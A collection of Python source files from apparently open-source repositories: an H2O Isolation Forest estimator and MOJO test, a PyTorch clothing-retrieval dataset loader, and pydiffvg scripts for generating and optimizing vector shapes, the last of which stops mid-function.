class H2OIsolationForestEstimator(H2OEstimator):
"""
Isolation Forest
Builds an Isolation Forest model. Isolation Forest algorithm samples the training frame
and in each iteration builds a tree that partitions the space of the sample observations until
it isolates each observation. Length of the path from root to a leaf node of the resulting tree
is used to calculate the anomaly score. Anomalies are easier to isolate and their average
tree path is expected to be shorter than paths of regular observations.
"""
algo = "isolationforest"
param_names = {"model_id", "training_frame", "score_each_iteration", "score_tree_interval", "ignored_columns",
"ignore_const_cols", "ntrees", "max_depth", "min_rows", "max_runtime_secs", "seed",
"build_tree_one_node", "mtries", "sample_size", "sample_rate", "col_sample_rate_change_per_level",
"col_sample_rate_per_tree", "categorical_encoding", "stopping_rounds", "stopping_metric",
"stopping_tolerance", "export_checkpoints_dir"}
def __init__(self, **kwargs):
super(H2OIsolationForestEstimator, self).__init__()
self._parms = {}
for pname, pvalue in kwargs.items():
if pname == 'model_id':
self._id = pvalue
self._parms["model_id"] = pvalue
elif pname in self.param_names:
# Using setattr(...) will invoke type-checking of the arguments
setattr(self, pname, pvalue)
else:
raise H2OValueError("Unknown parameter %s = %r" % (pname, pvalue))
@property
def training_frame(self):
"""
Id of the training data frame.
Type: ``H2OFrame``.
"""
return self._parms.get("training_frame")
@training_frame.setter
def training_frame(self, training_frame):
self._parms["training_frame"] = H2OFrame._validate(training_frame, 'training_frame')
@property
def score_each_iteration(self):
"""
Whether to score during each iteration of model training.
Type: ``bool`` (default: ``False``).
"""
return self._parms.get("score_each_iteration")
@score_each_iteration.setter
def score_each_iteration(self, score_each_iteration):
assert_is_type(score_each_iteration, None, bool)
self._parms["score_each_iteration"] = score_each_iteration
@property
def score_tree_interval(self):
"""
Score the model after every so many trees. Disabled if set to 0.
Type: ``int`` (default: ``0``).
"""
return self._parms.get("score_tree_interval")
@score_tree_interval.setter
def score_tree_interval(self, score_tree_interval):
assert_is_type(score_tree_interval, None, int)
self._parms["score_tree_interval"] = score_tree_interval
@property
def ignored_columns(self):
"""
Names of columns to ignore for training.
Type: ``List[str]``.
"""
return self._parms.get("ignored_columns")
@ignored_columns.setter
def ignored_columns(self, ignored_columns):
assert_is_type(ignored_columns, None, [str])
self._parms["ignored_columns"] = ignored_columns
@property
def ignore_const_cols(self):
"""
Ignore constant columns.
Type: ``bool`` (default: ``True``).
"""
return self._parms.get("ignore_const_cols")
@ignore_const_cols.setter
def ignore_const_cols(self, ignore_const_cols):
assert_is_type(ignore_const_cols, None, bool)
self._parms["ignore_const_cols"] = ignore_const_cols
@property
def ntrees(self):
"""
Number of trees.
Type: ``int`` (default: ``50``).
"""
return self._parms.get("ntrees")
@ntrees.setter
def ntrees(self, ntrees):
assert_is_type(ntrees, None, int)
self._parms["ntrees"] = ntrees
@property
def max_depth(self):
"""
Maximum tree depth.
Type: ``int`` (default: ``8``).
"""
return self._parms.get("max_depth")
@max_depth.setter
def max_depth(self, max_depth):
assert_is_type(max_depth, None, int)
self._parms["max_depth"] = max_depth
@property
def min_rows(self):
"""
Fewest allowed (weighted) observations in a leaf.
Type: ``float`` (default: ``1``).
"""
return self._parms.get("min_rows")
@min_rows.setter
def min_rows(self, min_rows):
assert_is_type(min_rows, None, numeric)
self._parms["min_rows"] = min_rows
@property
def max_runtime_secs(self):
"""
Maximum allowed runtime in seconds for model training. Use 0 to disable.
Type: ``float`` (default: ``0``).
"""
return self._parms.get("max_runtime_secs")
@max_runtime_secs.setter
def max_runtime_secs(self, max_runtime_secs):
assert_is_type(max_runtime_secs, None, numeric)
self._parms["max_runtime_secs"] = max_runtime_secs
@property
def seed(self):
"""
Seed for pseudo random number generator (if applicable)
Type: ``int`` (default: ``-1``).
"""
return self._parms.get("seed")
@seed.setter
def seed(self, seed):
assert_is_type(seed, None, int)
self._parms["seed"] = seed
@property
def build_tree_one_node(self):
"""
Run on one node only; no network overhead but fewer cpus used. Suitable for small datasets.
Type: ``bool`` (default: ``False``).
"""
return self._parms.get("build_tree_one_node")
@build_tree_one_node.setter
def build_tree_one_node(self, build_tree_one_node):
assert_is_type(build_tree_one_node, None, bool)
self._parms["build_tree_one_node"] = build_tree_one_node
@property
def mtries(self):
"""
        Number of variables randomly sampled as candidates at each split. If set to -1, defaults to (number of
        predictors)/3.
Type: ``int`` (default: ``-1``).
"""
return self._parms.get("mtries")
@mtries.setter
def mtries(self, mtries):
assert_is_type(mtries, None, int)
self._parms["mtries"] = mtries
@property
def sample_size(self):
"""
Number of randomly sampled observations used to train each Isolation Forest tree. Only one of parameters
sample_size and sample_rate should be defined. If sample_rate is defined, sample_size will be ignored.
Type: ``int`` (default: ``256``).
"""
return self._parms.get("sample_size")
@sample_size.setter
def sample_size(self, sample_size):
assert_is_type(sample_size, None, int)
self._parms["sample_size"] = sample_size
@property
def sample_rate(self):
"""
Rate of randomly sampled observations used to train each Isolation Forest tree. Needs to be in range from 0.0 to
1.0. If set to -1, sample_rate is disabled and sample_size will be used instead.
Type: ``float`` (default: ``-1``).
"""
return self._parms.get("sample_rate")
@sample_rate.setter
def sample_rate(self, sample_rate):
assert_is_type(sample_rate, None, numeric)
self._parms["sample_rate"] = sample_rate
@property
def col_sample_rate_change_per_level(self):
"""
Relative change of the column sampling rate for every level (must be > 0.0 and <= 2.0)
Type: ``float`` (default: ``1``).
"""
return self._parms.get("col_sample_rate_change_per_level")
@col_sample_rate_change_per_level.setter
def col_sample_rate_change_per_level(self, col_sample_rate_change_per_level):
assert_is_type(col_sample_rate_change_per_level, None, numeric)
self._parms["col_sample_rate_change_per_level"] = col_sample_rate_change_per_level
@property
def col_sample_rate_per_tree(self):
"""
Column sample rate per tree (from 0.0 to 1.0)
Type: ``float`` (default: ``1``).
"""
return self._parms.get("col_sample_rate_per_tree")
@col_sample_rate_per_tree.setter
def col_sample_rate_per_tree(self, col_sample_rate_per_tree):
assert_is_type(col_sample_rate_per_tree, None, numeric)
self._parms["col_sample_rate_per_tree"] = col_sample_rate_per_tree
@property
def categorical_encoding(self):
"""
Encoding scheme for categorical features
One of: ``"auto"``, ``"enum"``, ``"one_hot_internal"``, ``"one_hot_explicit"``, ``"binary"``, ``"eigen"``,
``"label_encoder"``, ``"sort_by_response"``, ``"enum_limited"`` (default: ``"auto"``).
"""
return self._parms.get("categorical_encoding")
@categorical_encoding.setter
def categorical_encoding(self, categorical_encoding):
assert_is_type(categorical_encoding, None, Enum("auto", "enum", "one_hot_internal", "one_hot_explicit", "binary", "eigen", "label_encoder", "sort_by_response", "enum_limited"))
self._parms["categorical_encoding"] = categorical_encoding
@property
def stopping_rounds(self):
"""
Early stopping based on convergence of stopping_metric. Stop if simple moving average of length k of the
stopping_metric does not improve for k:=stopping_rounds scoring events (0 to disable)
Type: ``int`` (default: ``0``).
"""
return self._parms.get("stopping_rounds")
@stopping_rounds.setter
def stopping_rounds(self, stopping_rounds):
assert_is_type(stopping_rounds, None, int)
self._parms["stopping_rounds"] = stopping_rounds
@property
def stopping_metric(self):
"""
        Metric to use for early stopping (AUTO: logloss for classification, deviance for regression and anomaly_score
for Isolation Forest). Note that custom and custom_increasing can only be used in GBM and DRF with the Python
client.
One of: ``"auto"``, ``"anomaly_score"`` (default: ``"auto"``).
"""
return self._parms.get("stopping_metric")
@stopping_metric.setter
def stopping_metric(self, stopping_metric):
assert_is_type(stopping_metric, None, Enum("auto", "anomaly_score"))
self._parms["stopping_metric"] = stopping_metric
@property
def stopping_tolerance(self):
"""
Relative tolerance for metric-based stopping criterion (stop if relative improvement is not at least this much)
Type: ``float`` (default: ``0.01``).
"""
return self._parms.get("stopping_tolerance")
@stopping_tolerance.setter
def stopping_tolerance(self, stopping_tolerance):
assert_is_type(stopping_tolerance, None, numeric)
self._parms["stopping_tolerance"] = stopping_tolerance
@property
def export_checkpoints_dir(self):
"""
Automatically export generated models to this directory.
Type: ``str``.
"""
return self._parms.get("export_checkpoints_dir")
@export_checkpoints_dir.setter
def export_checkpoints_dir(self, export_checkpoints_dir):
assert_is_type(export_checkpoints_dir, None, str)
self._parms["export_checkpoints_dir"] = export_checkpoints_dir
```
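A minimal training sketch for the estimator defined above, assuming a running H2O cluster; the CSV path reuses the illustrative file from the test below:

```python
import h2o
from h2o.estimators import H2OIsolationForestEstimator

h2o.init()
frame = h2o.import_file("smalldata/testng/airlines_train.csv")  # illustrative path
iso = H2OIsolationForestEstimator(ntrees=100, sample_size=256, seed=1234)
iso.train(training_frame=frame)
scores = iso.predict(frame)  # per-row anomaly score and mean tree path length
print(scores.head())
```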
#### File: tests/testdir_generic_model/pyunit_generic_model_mojo_drf.py
```python
import h2o
import tempfile
import os
from h2o.estimators import H2ORandomForestEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing
def test(x, y, output_test, strip_part, algo_name, generic_algo_name):
airlines = h2o.import_file(path=pyunit_utils.locate("smalldata/testng/airlines_train.csv"))
drf = H2ORandomForestEstimator(ntrees=1, nfolds = 3)
drf.train(x = x, y = y, training_frame=airlines, validation_frame=airlines)
print(drf)
with Capturing() as original_output:
drf.show()
original_model_filename = tempfile.mkdtemp()
original_model_filename = drf.download_mojo(original_model_filename)
model = H2OGenericEstimator.from_file(original_model_filename)
assert model is not None
print(model)
with Capturing() as generic_output:
model.show()
output_test(str(original_output), str(generic_output), strip_part, algo_name, generic_algo_name)
predictions = model.predict(airlines)
assert predictions is not None
assert predictions.nrows == 24421
assert model._model_json["output"]["variable_importances"] is not None
assert len(model._model_json["output"]["variable_importances"]._cell_values) > 0
assert model._model_json["output"]["model_summary"] is not None
assert len(model._model_json["output"]["model_summary"]._cell_values) > 0
    generic_mojo_filename = tempfile.mkdtemp("zip", "genericMojo")
generic_mojo_filename = model.download_mojo(path=generic_mojo_filename)
assert os.path.getsize(generic_mojo_filename) == os.path.getsize(original_model_filename)
def mojo_model_test_regression():
test(["Origin", "Dest"], "Distance", compare_output, "'Model Summary: '", 'ModelMetricsRegression: drf',
'ModelMetricsRegressionGeneric: generic')
def mojo_model_test_binomial():
test(["Origin", "Dest"], "IsDepDelayed", compare_output, "'Model Summary: '", 'ModelMetricsBinomial: drf',
'ModelMetricsBinomialGeneric: generic')
def mojo_model_test_multinomial():
test(["Origin", "Distance"], "Dest", compare_output, "'Model Summary: '", 'ModelMetricsMultinomial: drf',
'ModelMetricsMultinomialGeneric: generic')
if __name__ == "__main__":
pyunit_utils.standalone_test(mojo_model_test_binomial)
pyunit_utils.standalone_test(mojo_model_test_multinomial)
pyunit_utils.standalone_test(mojo_model_test_regression)
else:
mojo_model_test_multinomial()
mojo_model_test_binomial()
mojo_model_test_regression()
``` |
{
"source": "13952522076/DeepMetric",
"score": 3
} |
#### File: DeepMetric/DataSet/In_shop_clothes.py
```python
from __future__ import absolute_import, print_function
"""
In-shop-clothes data-set for Pytorch
"""
import torch
import torch.utils.data as data
from PIL import Image
import os
from torchvision import transforms
from collections import defaultdict
from DataSet.CUB200 import default_loader, Generate_transform_Dict
class MyData(data.Dataset):
def __init__(self, root=None, label_txt=None,
transform=None, loader=default_loader):
# Initialization data path and train(gallery or query) txt path
if root is None:
root = "data/InShopClothes"
label_txt = os.path.join(root, 'train.txt')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
if transform is None:
transform = transforms.Compose([
# transforms.CovertBGR(),
transforms.Resize(256),
transforms.RandomResizedCrop(scale=(0.16, 1), size=224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
# read txt get image path and labels
file = open(label_txt)
images_anon = file.readlines()
images = []
labels = []
for img_anon in images_anon:
img_anon = img_anon.replace(' ', '\t')
[img, label] = (img_anon.split('\t'))[:2]
images.append(img)
labels.append(int(label))
classes = list(set(labels))
# Generate Index Dictionary for every class
Index = defaultdict(list)
for i, label in enumerate(labels):
Index[label].append(i)
# Initialization Done
self.root = root
self.images = images
self.labels = labels
self.classes = classes
self.transform = transform
self.Index = Index
self.loader = loader
def __getitem__(self, index):
fn, label = self.images[index], self.labels[index]
# print(os.path.join(self.root, fn))
img = self.loader(os.path.join(self.root, fn))
if self.transform is not None:
img = self.transform(img)
return img, label
def __len__(self):
return len(self.images)
class InShopClothes:
def __init__(self, root=None, crop=False, origin_width=256, width=224, ratio=0.16):
# Data loading code
transform_Dict = Generate_transform_Dict(origin_width=origin_width, width=width, ratio=ratio)
if root is None:
root = 'data/In_shop_clothes'
train_txt = os.path.join(root, 'train.txt')
gallery_txt = os.path.join(root, 'gallery.txt')
query_txt = os.path.join(root, 'query.txt')
self.train = MyData(root, label_txt=train_txt, transform=transform_Dict['rand-crop'])
self.gallery = MyData(root, label_txt=gallery_txt, transform=transform_Dict['center-crop'])
self.query = MyData(root, label_txt=query_txt, transform=transform_Dict['center-crop'])
def testIn_Shop_Clothes():
data = InShopClothes()
print(len(data.gallery), len(data.train))
print(len(data.query))
print(data.train[1][0][0][0][1])
if __name__ == "__main__":
testIn_Shop_Clothes()
``` |
{
"source": "13952522076/diffvg",
"score": 2
} |
#### File: pair/generate/dataset.py
```python
import os
import pickle
import glob
import numpy as np
from torch.utils.data import Dataset
from typing import Any, Callable, Optional, Tuple
def load_data(root="../data/generate/generate/row_data/train", normalize=True):
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# DATA_DIR = os.path.join(BASE_DIR, 'data')
all_loss = []
all_segnum = []
all_color = []
color_map= {"RadialGradient":2, "LinearGradient":1, "Normal":0}
for file_name in glob.glob(os.path.join(BASE_DIR, root, '*.pkl')):
with open(file_name, "rb") as f:
row_list = pickle.load(f)
for row in row_list:
data = row["pixelwise_loss"].astype('float32')
if normalize:
data = (data-data.mean())/(data.std() + 1e-8) # mean/std normalize
data -= data.min()
data /= (data.max() + 1e-8) # scale to [0, 1]
all_loss.append(data)
all_segnum.append(row["best_num_segments"]-3) # minus 3 because it starts from 3
all_color.append(color_map[row["best_color"]])
all_loss = np.concatenate(all_loss, axis=0)
all_segnum = np.concatenate([all_segnum], axis=0)
all_color = np.concatenate([all_color], axis=0)
return all_loss, all_segnum, all_color
class LossDataset(Dataset):
def __init__(self, root="../data/generate/generate/row_data/train", normalize=True, transform: Optional[Callable] = None):
self.data, self.segnum, self.color = load_data(root, normalize)
self.transform = transform
def __getitem__(self, item):
data = self.data[item]
data = data.transpose(1, 2, 0)
segnum = self.segnum[item]
color = self.color[item]
if self.transform is not None:
data = self.transform(data)
return data, segnum, color
def __len__(self):
return self.data.shape[0]
if __name__ == "__main__":
import torchvision.transforms as transforms
load_data()
transform_train = transforms.Compose([ transforms.ToPILImage(),
transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()])
dataset = LossDataset(transform=transform_train)
Seg3_num = 0
Seg4_num = 0
Seg5_num = 0
Seg6_num = 0
Seg7_num = 0
Seg8_num = 0
Norm_num = 0
Linear_num = 0
Radial_num = 0
for i in range(0, len(dataset.segnum)):
if dataset.segnum[i] ==0:
Seg3_num +=1
if dataset.segnum[i] ==1:
Seg4_num +=1
if dataset.segnum[i] ==2:
Seg5_num +=1
if dataset.segnum[i] ==3:
Seg6_num +=1
if dataset.segnum[i] ==4:
Seg7_num +=1
if dataset.segnum[i] ==5:
Seg8_num +=1
if dataset.color[i] ==0:
Radial_num +=1
if dataset.color[i] ==1:
Linear_num +=1
if dataset.color[i] ==2:
Norm_num +=1
print(f"Seg3: {Seg3_num} Seg4: {Seg4_num} Seg5: {Seg5_num} Seg6: {Seg6_num} Seg7: {Seg7_num} Seg8: {Seg8_num}")
print(f"Radial_num: {Radial_num} Linear_num: {Linear_num} Norm_num: {Norm_num}")
# print(dataset.__len__())
# print(dataset.__getitem__(28))
for i in range (1,500):
t = np.random.randint(0,300)
data, segnum, color = dataset.__getitem__(t)
# print(data.max(), data.min(), segnum, color)
print(data.mean())
```
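A short usage sketch for `LossDataset`, mirroring the transform built in the `__main__` block above; the module name in the import and the data root are assumptions:

```python
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from dataset import LossDataset  # assumes the file above is saved as dataset.py

transform = transforms.Compose([transforms.ToPILImage(), transforms.Resize(224), transforms.ToTensor()])
train_set = LossDataset(root="../data/generate/generate/row_data/train", transform=transform)
loader = DataLoader(train_set, batch_size=32, shuffle=True, num_workers=2)

for loss_map, segnum, color in loader:
    # loss_map: [B, C, 224, 224] pixel-wise loss maps; segnum/color: integer targets
    print(loss_map.shape, segnum.shape, color.shape)
    break
```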
#### File: pair/generate/generate_template.py
```python
import pydiffvg
import torch
import os
import numpy as np
import cv2
import skimage
import skimage.io
import matplotlib.pyplot as plt
import random
import argparse
import math
import errno
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR
from torch.nn.functional import adaptive_avg_pool2d
import warnings
warnings.filterwarnings("ignore")
pydiffvg.set_print_timing(False)
gamma = 1.0
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--template_path", type=str, default="../data/generate/template")
parser.add_argument("--generate_path", type=str, default="../data/generate/generate")
parser.add_argument("--path_num_min", type=int, default=1)
parser.add_argument("--path_num_max", type=int, default=8)
parser.add_argument("--generate_num", type=int, default=2000)
return parser.parse_args()
def main():
args = parse_args()
shapes_list = []
shape_groups_list = []
try:
os.makedirs(os.path.join(args.generate_path,'img'))
except OSError as exc: # Python >2.5
pass
try:
os.makedirs(os.path.join(args.generate_path,'svg'))
except OSError as exc: # Python >2.5
pass
for root, dirs, files in os.walk(args.template_path):
for file in files:
if file.endswith(".svg"):
file_path = os.path.join(root, file)
canvas_width, canvas_height, shapes, shape_groups = pydiffvg.svg_to_scene(file_path)
canvas_width, canvas_height = 240, 240
shapes_list.extend(shapes)
shape_groups_list.extend(shape_groups)
shapes_num = len(shapes_list)
print(f"length of shapes_list is {len(shapes_list)}")
for t in tqdm(range(args.generate_num)):
path_num = np.random.randint(args.path_num_min, args.path_num_max+1) # [path_num_min, path_num_max]
path_indexes = np.random.randint(0, shapes_num, size=path_num).tolist()
selected_shapes = []
selected_shape_groups = []
shape_groups = []
shapes = []
for i in path_indexes:
selected_shape = shapes_list[i]
selected_shape_group = shape_groups_list[i]
new_path = pydiffvg.Path(num_control_points = selected_shape.num_control_points,
points = selected_shape.points,
stroke_width = torch.tensor(1.0),
is_closed = True)
points = new_path.points
# points = points + 1*(torch.rand_like(points)-0.5)
# if np.random.randint(1,3) ==1: # random shift the position
# mean_point = new_path.points.mean(dim=1, keepdim=True)
# points = points - mean_point + torch.rand_like(mean_point)*1.1*mean_point
# if np.random.randint(1,3) ==1: # random add some disturbance
# points = points * (1+ (0.02*(torch.rand_like(points)-0.5))) # [0.85-1.05]
new_path.points = points
shapes.append(new_path)
# process color
color = selected_shape_group.fill_color
if isinstance(selected_shape_group.fill_color, pydiffvg.RadialGradient):
print(f"{t} includes RadialGradient")
color.center = torch.rand_like(color.center)*(torch.tensor([canvas_width, canvas_height]).to(color.center.device))
color.radius = torch.rand_like(color.radius)*(torch.tensor([canvas_width, canvas_height]).to(color.radius.device))
# color.center = color.center * (0.1*(torch.rand_like(color.center)-0.5)+1.0)
# color.radius = color.radius * (0.1*(torch.rand_like(color.radius)-0.5)+1.0)
color.stop_colors = torch.rand_like(color.stop_colors)*1.3-0.1
color.stop_colors[:,3] = 1.0 # make most are 1.0
color.stop_colors.data.clamp_(0.0, 1.0)
elif isinstance(selected_shape_group.fill_color, pydiffvg.LinearGradient):
print(f"{t} includes LinearGradient")
color.begin = torch.rand_like(color.begin)*(torch.tensor([canvas_width, canvas_height]).to(color.begin.device))
color.end = torch.rand_like(color.end)*(torch.tensor([canvas_width, canvas_height]).to(color.end.device))
                # Order the gradient endpoints: begin gets the component-wise minimum, end the maximum.
                # (The original code updated begin in place before computing end, which could collapse the gradient.)
                color.begin[0], color.end[0] = min(color.begin[0], color.end[0]), max(color.begin[0], color.end[0])
                color.begin[1], color.end[1] = min(color.begin[1], color.end[1]), max(color.begin[1], color.end[1])
# color.begin = color.begin * (0.1*(torch.rand_like(color.begin)-0.5)+1.0)
# color.end = color.end * (0.1*(torch.rand_like(color.end)-0.5)+1.0)
color.stop_colors = torch.rand_like(color.stop_colors)*1.3-0.1
color.stop_colors[:,3] = 1.0 # make most are 1.0
color.stop_colors.data.clamp_(0.0, 1.0)
else:
color = torch.rand_like(color)*1.3-0.1
color[3] = 1.0 # make most are 1.0
color.data.clamp_(0.0, 1.0)
new_path_group = pydiffvg.ShapeGroup(shape_ids = torch.tensor([len(shapes) - 1]),
fill_color = color)
shape_groups.append(new_path_group)
scene_args = pydiffvg.RenderFunction.serialize_scene(canvas_width, canvas_height, shapes, shape_groups)
render = pydiffvg.RenderFunction.apply
img = render(canvas_width, canvas_height, 2, 2, 0, None, *scene_args)
if np.random.randint(1,3) ==1: # random add background
# Compose img with white background
img = img[:, :, 3:4] * img[:, :, :3] + torch.ones(img.shape[0], img.shape[1], 3, device = pydiffvg.get_device()) * (1 - img[:, :, 3:4])
pydiffvg.save_svg(os.path.join(args.generate_path, "svg", str(t)+'.svg'),
canvas_width, canvas_height, shapes, shape_groups)
else:
bg = torch.rand(1, 1, 3, device = pydiffvg.get_device())
img = img[:, :, 3:4] * img[:, :, :3] + bg * (1 - img[:, :, 3:4])
c1,c2,c3, a0=int(bg[0,0,0]*255), int(bg[0,0,1]*255),int(bg[0,0,2]*255), 1
pydiffvg.save_svg(os.path.join(args.generate_path, "svg", str(t)+'.svg'),
canvas_width, canvas_height, shapes, shape_groups,
background=f"background: rgba({c1}, {c2}, {c3}, {a0})")
pydiffvg.imwrite(img.cpu(), os.path.join(args.generate_path, "img", str(t)+'.png'), gamma=gamma)
if __name__ == "__main__":
main()
```
#### File: pair/Layerwise/check_init_points.py
```python
import pydiffvg
import torch
import os
import matplotlib.pyplot as plt
import random
import argparse
import math
import errno
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR
from torch.nn.functional import adaptive_avg_pool2d
pydiffvg.set_print_timing(False)
gamma = 1.0
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="target image path")
parser.add_argument("--num_paths", type=str, default="1,1,1")
parser.add_argument("--num_segments", type=int, default=4)
parser.add_argument("--num_iter", type=int, default=500)
parser.add_argument('--free', action='store_true')
parser.add_argument('--pool_size', type=int, default=12, help="the pooled image size for next path initialization")
parser.add_argument('--save_loss', action='store_true')
return parser.parse_args()
def init_new_paths(num_paths, canvas_width, canvas_height, args, num_old_shapes=0, pixel_loss=None):
shapes = []
shape_groups = []
# change path init location
if pixel_loss is not None:
region_loss = adaptive_avg_pool2d(pixel_loss, args.pool_size)
sorted, indices = torch.sort(region_loss.reshape(-1), dim=0, descending=True)
indices = indices[:num_paths]
indices_h = torch.div(indices, args.pool_size, rounding_mode='trunc')
indices_w = indices%(args.pool_size)
# [w,h] for diffvg
norm_postion = torch.cat([indices_w.unsqueeze(dim=-1), indices_h.unsqueeze(dim=-1)], dim=-1)
norm_postion = (norm_postion+0.5)/(args.pool_size + 1e-8)
# print(f"norm_position equals: {norm_postion}")
for i in range(num_paths):
num_segments = args.num_segments
num_control_points = torch.zeros(num_segments, dtype = torch.int32) + 2
points = []
p0 = (random.random(), random.random())
points.append(p0)
for j in range(num_segments):
radius = 0.05
p1 = (p0[0] + radius * (random.random() - 0.5), p0[1] + radius * (random.random() - 0.5))
p2 = (p1[0] + radius * (random.random() - 0.5), p1[1] + radius * (random.random() - 0.5))
p3 = (p2[0] + radius * (random.random() - 0.5), p2[1] + radius * (random.random() - 0.5))
points.append(p1)
points.append(p2)
if j < num_segments - 1:
points.append(p3)
p0 = p3
points = torch.tensor(points)
if pixel_loss is not None:
points = points-points.mean(dim=0, keepdim=True) + (norm_postion[i]).to(points.device)
# print(f"new path shape is {points.shape}, max val: {torch.max(points)}, min val: {torch.min(points)}")
points[:, 0] *= canvas_width
points[:, 1] *= canvas_height
path = pydiffvg.Path(num_control_points = num_control_points,
points = points,
stroke_width = torch.tensor(1.0),
is_closed = True)
shapes.append(path)
# !!!!!!problem is here. the shape group shape_ids is wrong
path_group = pydiffvg.ShapeGroup(shape_ids = torch.tensor([num_old_shapes+i]),
fill_color = torch.tensor([random.random(),
random.random(),
random.random(),
random.random()]))
shape_groups.append(path_group)
points_vars = []
color_vars = []
for path in shapes:
path.points.requires_grad = True
points_vars.append(path.points)
for group in shape_groups:
group.fill_color.requires_grad = True
color_vars.append(group.fill_color)
return shapes, shape_groups, points_vars, color_vars
def main():
args = parse_args()
# Use GPU if available
pydiffvg.set_use_gpu(torch.cuda.is_available())
random.seed(1234)
torch.manual_seed(1234)
render = pydiffvg.RenderFunction.apply
print(f"=> check init path ...")
# initialize new shapes related stuffs.
pixel_loss = torch.rand([1,1,240,240])
pixel_loss[0,0,2,200]=100
# pixel_loss[0,0,120,120]=100
# pixel_loss[0,0,239,239]=100
shapes, shape_groups, points_vars, color_vars = init_new_paths(
1, 240, 240, args, 0, pixel_loss)
save_name = 'check.svg'
pydiffvg.save_svg(save_name, 240, 240, shapes, shape_groups)
new_shapes = []
for path in shapes:
print(f"path point: {path.points}")
print(f"path point shape is: {path.points.shape}")
path.points = path.points-path.points.mean(dim=0,keepdim=True)+120
new_shapes.append(path)
# points_vars.append(path.points)
pydiffvg.save_svg("check2.svg", 240, 240, new_shapes, shape_groups)
# Optimize
points_vars = [*points_vars]
color_vars = [*color_vars]
# print(f"control points are: {points_vars}")
print(f"\nDone!\n")
if __name__ == "__main__":
main()
```
#### File: Layerwise/debug/debug_initialization.py
```python
import numpy as np
import cv2
import random
import torch
import matplotlib.pyplot as plt
def get_bezier_circle(radius=1, segments=4, bias=None):
points = []
if bias is None:
bias = (random.random(), random.random())
avg_degree = 360 / (segments*3)
for i in range(0, segments*3):
point = (np.cos(np.deg2rad(i * avg_degree)),
np.sin(np.deg2rad(i * avg_degree)))
points.append(point)
points = torch.tensor(points)
points = (points)*radius + torch.tensor(bias).unsqueeze(dim=0)
points = points.type(torch.FloatTensor)
return points
if __name__ == "__main__":
points = get_bezier_circle(0.1, 8)
print(points.shape)
print(points)
x_list = []
y_list = []
labels = []
for i in range(0, points.shape[0]):
x_list.append((points[i,0]).item())
y_list.append((points[i,1]).item())
labels.append(i)
fig, ax = plt.subplots()
ax.scatter(x_list, y_list)
ax.plot(x_list, y_list)
for i, txt in enumerate(labels):
ax.annotate(txt, (x_list[i], y_list[i]))
plt.show()
```
#### File: pair/Layerwise/recursive.py
```python
import pydiffvg
import torch
import os
import skimage
import skimage.io
import random
import argparse
import math
import errno
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR
pydiffvg.set_print_timing(False)
gamma = 1.0
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="target image path")
parser.add_argument("--num_paths", type=str, default="1,2")
parser.add_argument("--num_segments", type=int, default=4)
parser.add_argument("--num_iter", type=int, default=500)
parser.add_argument('--free', action='store_true')
return parser.parse_args()
try:
os.makedirs("results/recursive")
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir("results/recursive"):
pass
else:
raise
def load_image(args):
target = torch.from_numpy(skimage.io.imread(args.target)).to(torch.float32) / 255.0
print(f"Input image shape is: {target.shape}")
if target.shape[2] == 4:
print("Input image includes alpha channel, simply dropout alpha channel.")
target = target[:, :, :3]
target = target.pow(gamma)
target = target.to(pydiffvg.get_device())
target = target.unsqueeze(0).permute(0, 3, 1, 2) # NHWC -> NCHW
return target
def init_new_paths(num_paths, canvas_width, canvas_height, args):
shapes = []
shape_groups = []
for i in range(num_paths):
num_segments = args.num_segments
num_control_points = torch.zeros(num_segments, dtype = torch.int32) + 2
points = []
p0 = (random.random(), random.random())
points.append(p0)
for j in range(num_segments):
radius = 0.05
p1 = (p0[0] + radius * (random.random() - 0.5), p0[1] + radius * (random.random() - 0.5))
p2 = (p1[0] + radius * (random.random() - 0.5), p1[1] + radius * (random.random() - 0.5))
p3 = (p2[0] + radius * (random.random() - 0.5), p2[1] + radius * (random.random() - 0.5))
points.append(p1)
points.append(p2)
if j < num_segments - 1:
points.append(p3)
p0 = p3
points = torch.tensor(points)
points[:, 0] *= canvas_width
points[:, 1] *= canvas_height
path = pydiffvg.Path(num_control_points = num_control_points,
points = points,
stroke_width = torch.tensor(1.0),
is_closed = True)
shapes.append(path)
path_group = pydiffvg.ShapeGroup(shape_ids = torch.tensor([len(shapes) - 1]),
fill_color = torch.tensor([random.random(),
random.random(),
random.random(),
random.random()]))
shape_groups.append(path_group)
points_vars = []
color_vars = []
for path in shapes:
path.points.requires_grad = True
points_vars.append(path.points)
for group in shape_groups:
group.fill_color.requires_grad = True
color_vars.append(group.fill_color)
return shapes, shape_groups, points_vars, color_vars
def main():
args = parse_args()
# Use GPU if available
pydiffvg.set_use_gpu(torch.cuda.is_available())
filename = os.path.splitext(os.path.basename(args.target))[0]
target = load_image(args)
canvas_width, canvas_height = target.shape[3], target.shape[2]
num_paths_list = [int(i) for i in args.num_paths.split(',')]
random.seed(1234)
torch.manual_seed(1234)
render = pydiffvg.RenderFunction.apply
current_path_str = ""
old_shapes, old_shape_groups = [], []
for num_paths in num_paths_list:
print(f"=> Adding {num_paths} paths ...")
current_path_str = current_path_str+str(num_paths)+","
# initialize new shapes related stuffs.
shapes, shape_groups, points_vars, color_vars = init_new_paths(num_paths, canvas_width, canvas_height, args)
old_points_vars = []
old_color_vars = []
if len(old_shapes)>0:
for old_path in old_shapes:
if args.free:
old_path.points.requires_grad = True
old_points_vars.append(old_path.points)
else:
old_path.points.requires_grad = False
for old_group in old_shape_groups:
if args.free:
old_group.fill_color.requires_grad = True
old_color_vars.append(old_group.fill_color)
else:
old_group.fill_color.requires_grad = False
shapes = old_shapes+shapes
shape_groups = old_shape_groups+shape_groups
# Optimize
points_vars = old_points_vars + points_vars
color_vars = old_color_vars + color_vars
